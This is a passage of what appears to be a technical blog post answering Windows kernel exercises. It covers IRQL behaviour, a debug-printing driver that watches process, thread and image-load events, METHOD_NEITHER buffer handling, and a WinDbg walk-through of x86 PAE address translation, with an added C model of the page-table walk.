<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">First explanation: if a driver thread runs at DISPATCH_LEVEL, it cannot be interrupted (or pre-empted) by other code from lower IRQLs (namely PASSIVE_LEVEL and APC_LEVEL). If such a thread accesses a page that has been swapped to disk, the page fault handler will generate an I/O operation to read the page from the disk and restore it in memory... and here is the catch: the I/O completion runs at APC_LEVEL, which means that the I/O for the swapped page won't be able to complete, causing a BSOD.</span></li>
</ul>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Second explanation: page faults at DISPATCH_LEVEL may not be caught by exception handlers. Even if a driver encloses a "dangerous" piece of code inside a try/except statement, if such code generates, for example, a page fault in non-paged memory, the fault will not be dispatched to the exception handler and the system will throw a blue screen. Thus, even writing "careful" code that protects pointer dereferences with exception handlers will not prevent blue screens. Here is a quote from a minidump generated by a PAGE_FAULT_IN_NONPAGED_AREA:</span></li>
</ul>
<ul><span style="font-family: Courier New, Courier, monospace;">PAGE_FAULT_IN_NONPAGED_AREA (50)</span></ul>
<ul><span style="font-family: Courier New, Courier, monospace;">Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe.</span></ul>
<ul><span style="font-family: Verdana, sans-serif;">Note that there are page faults that can be safely caught by exception handlers, e.g. access violations to usermode pointers.</span></ul>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>2) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span>
<span style="font-family: Verdana, sans-serif;"><u>Thread priority</u> is used by the scheduler to decide which thread must be run next and for how long. The operation of interrupting a thread to schedule the next one is called <u>thread dispatching</u>. However, the thread dispatcher only operates at PASSIVE_LEVEL or APC_LEVEL. Thus, if a thread is at DISPATCH_LEVEL or above, the thread dispatcher won't be able to pre-empt it and the thread "priority" will depend</span><span style="font-family: Verdana, sans-serif;"> on the </span><u style="font-family: Verdana, sans-serif;">IRQL</u><span style="font-family: Verdana, sans-serif;"> itself</span><span style="font-family: Verdana, sans-serif;">. Therefore, in this sense,</span><span style="font-family: Verdana, sans-serif;"> code in kernel mode that runs at DISPATCH_LEVEL can run "faster", but having a heavy workload at high IRQL will cause a general degradation of performance for the whole system. Code that runs at high IRQL should be designed to run and finish its task as quickly as possible in order not to degrade performance in general.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>3)</b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following code monitors the creation and termination of threads and processes, and the loading and unloading of executable modules.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #include <ntddk.h>
 DRIVER_INITIALIZE DriverEntry;
 #ifdef ALLOC_PRAGMA
 #pragma alloc_text( INIT, DriverEntry )
 #endif

 // Called for every executable image (EXE, DLL or driver) mapped into a process
 VOID ImageHandler(
     __in_opt PUNICODE_STRING FullImageName,
     __in HANDLE ProcessId,
     __in PIMAGE_INFO ImageInfo
     )
 {
     UNREFERENCED_PARAMETER(FullImageName);
     UNREFERENCED_PARAMETER(ProcessId);
     // %p prints the pointer at the platform's width (the original %016x is only right on 32-bit)
     DbgPrint("ImageBase: %p\n", ImageInfo->ImageBase);
 }

 // Called on process creation (Create == TRUE) and exit (Create == FALSE)
 VOID ProcessHandler(
     IN HANDLE ParentId,
     IN HANDLE ProcessId,
     IN BOOLEAN Create
     )
 {
     UNREFERENCED_PARAMETER(ParentId);
     UNREFERENCED_PARAMETER(Create);
     // ids fit in 32 bits: cast explicitly instead of passing a HANDLE to %08x
     DbgPrint("Pid: %08x\n", (ULONG)(ULONG_PTR)ProcessId);
 }

 // Called on thread creation (Create == TRUE) and termination (Create == FALSE)
 VOID ThreadHandler(
     IN HANDLE ProcessId,
     IN HANDLE ThreadId,
     IN BOOLEAN Create
     )
 {
     UNREFERENCED_PARAMETER(ProcessId);
     UNREFERENCED_PARAMETER(Create);
     DbgPrint("Tid: %08x\n", (ULONG)(ULONG_PTR)ThreadId);
 }

 VOID MyUnload(
     __in PDRIVER_OBJECT DriverObject
     )
 {
     UNREFERENCED_PARAMETER(DriverObject);
     DbgPrint("Unload routine\n");
     // every callback must be removed before the driver image goes away
     if(PsRemoveLoadImageNotifyRoutine(&ImageHandler) != STATUS_SUCCESS ||
        PsSetCreateProcessNotifyRoutine(&ProcessHandler, TRUE) != STATUS_SUCCESS ||
        PsRemoveCreateThreadNotifyRoutine(&ThreadHandler) != STATUS_SUCCESS)
     {
         DbgPrint("Error in unregistering notify routines\n");
     }
 }

 NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath)
 {
     NTSTATUS StatusTemp;
     UNREFERENCED_PARAMETER(RegistryPath);
     DbgPrint("Driver started\n");
     DriverObject->DriverUnload = &MyUnload;
     StatusTemp = PsSetLoadImageNotifyRoutine(&ImageHandler);
     if( StatusTemp != STATUS_SUCCESS )
     {
         DbgPrint("Error registering ImageHandler\n");
         return StatusTemp;
     }
     StatusTemp = PsSetCreateProcessNotifyRoutine(&ProcessHandler, FALSE);
     if( StatusTemp != STATUS_SUCCESS )
     {
         DbgPrint("Error registering ProcessHandler\n");
         // undo the registration that succeeded, or the kernel keeps calling into an unloaded image
         PsRemoveLoadImageNotifyRoutine(&ImageHandler);
         return StatusTemp;
     }
     StatusTemp = PsSetCreateThreadNotifyRoutine(&ThreadHandler);
     if(StatusTemp != STATUS_SUCCESS)
     {
         DbgPrint("Error registering ThreadHandler\n");
         PsSetCreateProcessNotifyRoutine(&ProcessHandler, TRUE);
         PsRemoveLoadImageNotifyRoutine(&ImageHandler);
         return StatusTemp;
     }
     return STATUS_SUCCESS;
 }
 </code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">An example of the output it produces:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fcae0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fcae0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000e64</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000003dc</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000006c4</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000005b8</span><br />
<span style="font-family: Courier New, Courier, monospace;">Pid: 00000f48</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000da8</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000ac8</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000c6c</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000870</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000d20</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000006b4</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000448</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000ed4</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000d8c</span><br />
<span style="font-family: Courier New, Courier, monospace;">Pid: 00000d50</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000005b0</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000ff330000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 0000000077bd0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 0000000077ab0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fdbc0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000ffe00000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000ff4d0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fe180000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fe1b0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<div>
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>4) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If METHOD_NEITHER is employed, the I/O manager does not perform any validation on the buffer that is received from the usermode application, nor does it generate an MDL for it (as opposed to METHOD_BUFFERED and METHOD_[IN/OUT]_DIRECT). This means that the address of the usermode buffer is passed directly to the target driver, which is in charge of performing all the necessary validations. A driver should probe the pages to make them resident and to verify that it has the requested access (e.g. read/write) to the user buffer. Then, it should lock the pages (so that they won't be paged out to the swap file) and access the data, making sure that the code that does these operations is enclosed in a try/except block to handle potential exceptions (e.g. if a usermode thread changes the memory protection of the buffer while the driver is accessing it). The use of METHOD_NEITHER also implies that the driver code that carries out the validation of the buffer needs to run in the same context as the thread that generated the IOCTL request (for example, if the IRP is queued for later processing, it may be processed in an arbitrary thread/process context, and the address of the user buffer may then no longer refer to the correct virtual memory).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>5) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The address I chose to translate is f897a000 (the base address of a driver).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> db f897a000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a030 00 00 00 00 00 00 00 00-00 00 00 00 e0 00 00 00 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This address corresponds to a 4K page on an x86 system with PAE enabled. I break down the virtual address into its components according to Intel's documentation:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<pre style="font-family: Courier New, Courier, monospace;">f897a000 hex
11111000100101111010000000000000 bin

11      111000100     101111010     000000000000   (broken out)
PDPE    PDE           PTE           Offset
2 bits  9 bits        9 bits        12 bits
3       1c4h (452d)   17ah (378d)   0
</pre></div>
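<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added example (hosted C written for this page, not the post's own code), the following program splits a 32-bit virtual address into the PAE components listed above and then carries the translation through a full PDPT, PD and PT walk, including the 2 MB large-page case and the not-present case, which the decomposition alone does not show. It uses f897a000 and the alg.exe DirBase that the <i>!process</i> output further down reports; the page-table entries themselves are constructed for the example and are not the real machine's contents, so the physical address it prints is only valid for that model.</span></div>

```c
#include <stdint.h>
#include <stdio.h>

/* x86 PAE splits a 32-bit virtual address into a 2-bit PDPT index, a 9-bit
 * page-directory index, a 9-bit page-table index and a 12-bit page offset. */
typedef struct {
    unsigned pdpt_index;   /* bits 31..30 */
    unsigned pd_index;     /* bits 29..21 */
    unsigned pt_index;     /* bits 20..12 */
    unsigned offset;       /* bits 11..0  */
} pae_va_parts;

pae_va_parts pae_split(uint32_t va)
{
    pae_va_parts p;
    p.pdpt_index = (va >> 30) & 0x3;
    p.pd_index   = (va >> 21) & 0x1FF;
    p.pt_index   = (va >> 12) & 0x1FF;
    p.offset     = va & 0xFFF;
    return p;
}

/* Entry bits used by the walk (Intel SDM vol. 3, PAE paging). */
#define ENTRY_PRESENT   (1ULL << 0)
#define ENTRY_LARGEPAGE (1ULL << 7)            /* PDE only: maps a 2 MB page */
#define ENTRY_ADDR_MASK 0x000FFFFFFFFFF000ULL  /* next-level table or frame, bits 12..51 */

/* Constructed model of physical memory: only the three 8-byte entries the
 * walk touches exist. The table contents are invented for this example; only
 * DirBase (alg.exe, from !process) and the VA come from the post. */
typedef struct { uint64_t phys; uint64_t value; } phys_qword;

static const uint64_t kDirBase = 0x081002e0ULL;   /* CR3: the PDPT is 32-byte aligned, low 5 bits are flags */

static const phys_qword kPhysMemory[] = {
    { 0x081002e0ULL + 0x3   * 8, 0x0000000008a00001ULL }, /* PDPTE 3: present, PD at 0x08a00000 */
    { 0x08a00000ULL + 0x1c4 * 8, 0x0000000008b00063ULL }, /* PDE 1c4h: present, RW, A, D, PT at 0x08b00000 */
    { 0x08b00000ULL + 0x17a * 8, 0x000000003f2a5163ULL }, /* PTE 17ah: present, RW, A, D, G, PFN 0x3f2a5 */
};

/* Returns 1 and the entry at phys, or 0 if the model has no memory there. */
static int read_phys_qword(uint64_t phys, uint64_t *out)
{
    for (unsigned i = 0; i < sizeof kPhysMemory / sizeof kPhysMemory[0]; i++) {
        if (kPhysMemory[i].phys == phys) { *out = kPhysMemory[i].value; return 1; }
    }
    return 0;
}

/* Walks PDPT -> PD -> PT as the MMU does. Returns 1 with *pa filled in, or 0
 * where a level is not present (the case the CPU reports as a page fault). */
int pae_translate(uint32_t va, uint64_t dirbase, uint64_t *pa)
{
    pae_va_parts p = pae_split(va);
    uint64_t pdpte, pde, pte;

    if (!read_phys_qword((dirbase & ~0x1FULL) + p.pdpt_index * 8, &pdpte) || !(pdpte & ENTRY_PRESENT))
        return 0;
    if (!read_phys_qword((pdpte & ENTRY_ADDR_MASK) + p.pd_index * 8, &pde) || !(pde & ENTRY_PRESENT))
        return 0;
    if (pde & ENTRY_LARGEPAGE) {   /* 2 MB page: VA bits 20..0 are the offset */
        *pa = (pde & 0x000FFFFFFFE00000ULL) | (va & 0x1FFFFF);
        return 1;
    }
    if (!read_phys_qword((pde & ENTRY_ADDR_MASK) + p.pt_index * 8, &pte) || !(pte & ENTRY_PRESENT))
        return 0;
    *pa = (pte & ENTRY_ADDR_MASK) | p.offset;
    return 1;
}

int main(void)
{
    uint32_t va = 0xf897a000u;
    pae_va_parts p = pae_split(va);
    uint64_t pa;
    printf("VA %08x -> PDPTE %u, PDE %03xh (%ud), PTE %03xh (%ud), offset %03x\n",
           va, p.pdpt_index, p.pd_index, p.pd_index, p.pt_index, p.pt_index, p.offset);
    if (pae_translate(va, kDirBase, &pa))
        printf("PA %09llx\n", (unsigned long long)pa);   /* 03f2a5000 with the constructed tables */
    return 0;
}
```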
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Next, I need a page directory in order to perform the translation. Since the address I chose is a kernel-mode one, I can get the page directory from any process: in this case I used the one of "alg.exe". I get it by listing all the processes with:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">!process 0 0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><b>PROCESS 820a8240</b> SessionId: 0 Cid: 04e4 Peb: 7ffde000 ParentCid: 029c</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> <b>DirBase: 081002e0</b> ObjectTable: e1f36ae0 HandleCount: 105.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> Image: alg.exe</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I can double-check it in the related EPROCESS structure, where the page directory is stored in the DirectoryTableBase member:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> dt -b nt!_EPROCESS 820a8240 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Pcb : _KPROCESS</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Header : _DISPATCHER_HEADER</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Type : 0x3 ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x001 Absolute : 0 ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x002 Size : 0x1b ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x003 Inserted : 0 ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x004 SignalState : 0n0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x008 WaitListHead : _LIST_ENTRY [ 0x81a97398 - 0x81a97398 ]</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Flink : 0x81a97398 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x004 Blink : 0x81a97398 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x010 ProfileListHead : _LIST_ENTRY [ 0x820a8250 - 0x820a8250 ]</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Flink : 0x820a8250 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x004 Blink : 0x820a8250 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x018 <b>DirectoryTableBase</b> : </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> [00] <b>0x81002e0</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> [01] 0xf454</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x020 LdtDescriptor : _KGDTENTRY</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The first step consists in retrieving the address of the page directory from the PDPE array.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDPE entry number 3: 81002e0 + 3*8 = 81002F8</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 081002e0 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 81002e0 0f691001 00000000 0f452001 00000000 ..i...... E.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 81002f0 0f693001 00000000 <b>0f610001</b> 00000000 .0i.......a.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 8100300 133db001 00000000 1ea1c001 00000000 ..=.............</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The value I am looking for is 0f610001. The lower 12 bits are used to store flags and other information, thus they can be ignored and set to zero to obtain the page address, which is </span><span style="font-family: Verdana, sans-serif;">0f610000.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In the second step, I locate the address of the page table from the page directory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDE entry number 1C4: 0f610000 + 1c4*8 = F610E20.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc F610E20</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f610e20 <b>01032163</b> 00000000 01033163 00000000 c!......c1......</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f610e30 01034163 00000000 01035163 00000000 cA......cQ......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I obtain the value 01032163, from which I zero out the lower 12 bits to obtain the page address </span><span style="font-family: Verdana, sans-serif;">01032000.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The third step gives me the address of the memory page from the page table.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PTE entry number 17a: 01032000 + 17a*8 = 1032BD0.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 1032BD0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 1032bd0 <b>0437b163</b> 00000000 0437c121 00000000 c.7.....!.7.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 1032be0 0437d121 00000000 0437e163 00000000 !.7.....c.7.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The value is 0437b163, that is </span><span style="font-family: Verdana, sans-serif;">0437b000 when the lower 12 bits are zeroed. This is the physical address of the memory page.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In the final step I add the "offset" part of the virtual address to the address I just obtained in step 3 in order to have the final physical address of the data I'm looking for. In this case, the offset is zero, thus the address remains 0437b000. I can verify that it is correct by visualizing the data pointed by the physical address:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 0437b000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b000 00905a4d 00000003 00000004 0000ffff MZ..............</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b010 000000b8 00000000 00000040 00000000 ........@.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b020 00000000 00000000 00000000 00000000 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b030 00000000 00000000 00000000 000000e0 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b040 0eba1f0e cd09b400 4c01b821 685421cd ........!..L.!Th</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b050 70207369 72676f72 63206d61 6f6e6e61 is program canno</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b060 65622074 6e757220 206e6920 20534f44 t be run in DOS </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b070 65646f6d 0a0d0d2e 00000024 00000000 mode....$.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is the same data that I saw earlier when visualizing the virtual address f897a000. A further verification can be done with !vtop:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !vtop 0 f897a000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: Virt f897a000, pagedir 8100320</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE PDPE 8100338 - 000000001cd53001</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE PDE 1cd53e20 - 0000000001032163</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE PTE 1032bd0 - 000000000437b163</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE Mapped phys <b>437b000</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">Virtual address f897a000 translates to physical address 437b000.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">My system also supports large 2MB pages, thus I decided to perform the same virtual-to-physical translation on a 2MB page. The operating system uses large pages for the kernel, the HAL and the non-paged pool, hence I chose the address of the NtCreateFile API, which is located inside the kernel (therefore inside a 2MB page).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The address to translate is: 8056d14c (NtCreateFile)</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Similarly to the previous translation, I start by identifying the components of the virtual address:</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">8056d14c hex</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">10000000010101101101000101001100 bin</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> 10 000000010 101101101000101001100 (broken out)</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">PDPE PDE Offset</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">2 bits 9 bits 21 bits</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> 2 2 16D14Ch</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The only difference is that this time the translation is one step shorter (there is no PTE level). Again, I use the page directory from the "alg.exe" process.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I start by extracting the page directory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDPE entry number 2: 081002e0 + 2*8 = 81002f0</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 81002f0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 81002f0 <b>0f693001</b> 00000000 0f610001 00000000 .0i.......a.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 8100300 133db001 00000000 1ea1c001 00000000 ..=.............</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I obtain the address 0f693000, which I use to retrieve the physical address of the memory page:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDE entry number 2: 0f693000 + 2*8 = 0f693010</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 0f693010</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f693010 <b>004001e3</b> 00000000 006001e3 00000000 ..@.......`.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f693020 00b08163 00000000 00b09163 00000000 c.......c.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">And I end up with 00400000, to which I need to add the offset:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
